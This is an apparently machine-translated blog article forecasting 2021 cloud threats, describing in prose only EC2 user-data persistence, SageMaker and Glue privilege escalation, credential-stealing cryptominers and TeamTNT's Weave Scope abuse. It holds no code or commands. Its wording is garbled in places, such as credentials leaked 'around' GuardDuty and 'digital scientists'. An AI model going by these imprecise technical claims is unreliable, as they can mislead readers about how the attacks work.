Security is a top priority in the cloud era, as the cloud provides malicious actors with more target sets than ever before and new tools to attack. These attacks are based on a wide range of starting points — from generic credentials, such as forgotten or stolen credentials, to new credentials using data science tools such as AWS Glue and Sage Maker, to complex attacks using powerful tools such as Kubernetes.

We will certainly see more attacks on cloud services in 2021. Here are the cloud security threats forecast for the coming year:

Sustained attack

Cloud architectures provide complete flexibility when creating new instances and running virtual machines that can match any hardware or software environment required. However, this flexibility, if not properly protected, can lead to malicious actors launching attacks and continuing attacks while retaining control of the initial attack.

Cloud Services like Amazon Web Services make it easy for developers to build environments in a progressive or intermittent manner. AWS, for example, allows developers to execute scripts automatically every time an Amazon EC2 instance (that is, user data) is restarted, which means that if a hacker manages to exploit an instance with a toxic shell script that might have been passed to a cloud instance, they will be able to continuously exploit its connection to the server.

In this way, hackers will be able to move laterally within the server, stealing data or gaining privileges that allow them to further exploit an organization’s assets. Of course, an administrator could turn this option off and require developers to log in every time they return to the environment — but this would require active cooperation from developers. AWS’s flexibility is essentially its weakness; In addition to having too many configuration options, there are also more opportunities for services to be misconfigured, leaving more open for hackers to attack.

Data science tool attacks

Notebooks have proved indispensable to data scientists, helping them integrate and analyze data quickly. Tools like AWS Sage Maker can make the process more efficient, helping data scientists build, train, and deploy machine learning models. However, as a relatively new tool, its audience is not all people in the security field, and naturally, the security awareness will be relatively weak, which also gives opportunities for malicious actors.

Like other Amazon products, tools like Sage Maker are flexible and have many options. Studies have shown that malicious actors can take advantage of some of these options to enhance their privileges and even grant themselves higher administrator privileges. This attack path could enable malicious actors to open terminal functions on cloud instances and leak credential data around Amazon GuardDuty, which can be used to access high-level roles and permissions. Similarly, malicious actors can leverage open source projects such as CloudGoat and upgrade privileges using AWS Glue, CodeBuild and S3, as well as unused groups and roles. In this context, administrators and digital scientists also need to familiarize themselves with the architecture of the systems they are using to protect themselves and minimize the space for malicious actors.

Bots can infect cloud legacy assets

Robots are everywhere, even in the cloud; According to a survey by security firm GlobalDots, more than 80% of “malicious bots” — bots that steal data, grab content, distribute spam, run distributed denial of service attacks, and so on — operate in cloud-based data centers. While many bots will poison other sites — using the servers they control to attack other servers and users — they can also simply control the cloud infrastructure to perform tasks for their owners. More popular among these tasks, according to the study, is cryptomining, which is in some ways one of the biggest cyberthreats around.

As if stealing resources and money wasn’t enough, a new variant of cryptocurrency mining malware is now also stealing AWS credentials, according to researchers. The worm uses cryptocurrency mining malware to encapsulate and look for unencrypted AWS CLI files from which it extracts credential data. The solution is to limit access to this data — but this also requires active cooperation from administrators.

More Kubernetes threats to come

TeamTNT, the same cybercrime group responsible for the AWS credentials theft, took advantage of common configuration errors to develop ways to abuse visualization and monitoring tool Weave Scope. Hackers use the default open access granted through port 4040 to install Weave Scope and use it as a way to monitor systems, leverage resources, install applications, start or close a back door to shells in containers, and do whatever they want.

Weave Scope has been successfully incorporated into cloud-based attacks, according to new research published by Internet security firm Intezer and Microsoft.

Currently, hackers mostly use these methods to install cryptocurrency mining malware, but there is no way to stop them from taking control of cloud systems for malicious purposes. The medium of attack is constantly changing and growing. As Google’s Kubernetes project continues to evolve and add new features and features, more and more businesses and developers have moved their work to K8S. This also attracted the attention of malicious actors, who started penetration testing and looking for opportunities to exploit new features in the Kubernetes project — bugs and misconfigurations that users were unlikely to fill because they didn’t know how to do it, or even knew Kubernetes at all.

To preempt or preempt

As more organizations install more cloud applications, attacks on the cloud will naturally grow. Companies’ public cloud spending is expected to more than double their 2019 allocations by 2023, but we’re sure we’ll see more of these and other types of attacks in the future as attackers continue to look for the “weakest link” they can exploit.

Unfortunately, most of these problems, as well as new ones that are still emerging, are in fact correctable, but many administrators and users generally don’t see them until they happen. By then, they have become “victims” and their stories are published on the security company’s blogs, before they can figure out how to fix what has happened.

To avoid this, the trick is to find “holes” or misconfigurations that provide an entry point for hackers, and then fix the problem before it becomes a real attack. As cloud usage continues to increase in 2021, user security awareness about configuration issues — and how to solve them — will have to grow in tandem.

【White whoring network security learning materials】